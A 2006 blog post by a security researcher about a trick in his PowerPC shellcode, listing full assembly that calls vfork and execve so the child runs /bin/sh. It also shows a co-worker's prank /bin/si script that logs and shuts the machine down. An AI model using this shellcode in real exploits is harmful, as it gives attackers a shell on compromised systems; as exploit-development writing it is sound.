On the value of clever defenses

Dino Dai Zovi | March 31st, 2006 | Filed Under: Uncategorized

My PowerPC shellcode actually forks before running the shell because I still want control of the parent process to clean up, exit the thread, or whatever. To do this compactly, both processes add $r4, which after calling fork() holds 1 in the parent and 0 in the child, to the register holding the last part of the “/bin/sh” string and exec that binary. That way, the child executes “/bin/sh”, while the parent tries to execute “/bin/si”, which fails and it continues executing the code below.

;;;
;;; VForking shellcode - Call vfork() and execute /bin/sh in child process.  
;;; In parent, we exec "/bin/si" ("/bin/sh" + 1), fail, and run the code that 
;;; follows the execve().
;;;
Lfork_execve_binsh:
 ;; call vfork (necessary to exec in threaded programs)
 li r30, 0x42ff
 srawi r0, r30, 8 
 .long 0x44ffff02
 .long 0x7c842008
 xor r31, r31, r31
 lis r30, 0x2f2f
 addi r30, r30, 0x7367
 add r30, r30, r4 ; In child, $r4 should be zero
 lis r29, 0x2f62
 addi r29, r29, 0x696e
 xor r28, r28, r28
 addi r27, r1, -12
 stmw r27, -12(r1) ; -12 is arbitrary null-eliding constant
 addi r4, r1, -12
 addi r3, r1, -4
 xor r5, r5, r5
 li r30, 30209
 srawi r0, r30, 9 ; r0 = 59
 .long 0x44ffff02 ; execve(path, argv, NULL)
Lparent:
;;; ...

A co-worker, who shall remain nameless, has implemented Advanced Negative-One Day Protection (TM) against me by creating a real /bin/si:

#!/bin/sh
logger -t F**KTARD "DDZ Shellcode Detector Activated"
/sbin/shutdown -h now "Security Alert: DDZ Shellcode Attempt"

Let’s see what happens when I modify my payload to add the return value of fork() to the string instead. Muihaha…(we hear the familiar “chwoung” of a mac booting in the background).

Moral of the story: Your defenses should be strong enough such that bragging about how funny they are does not render them useless.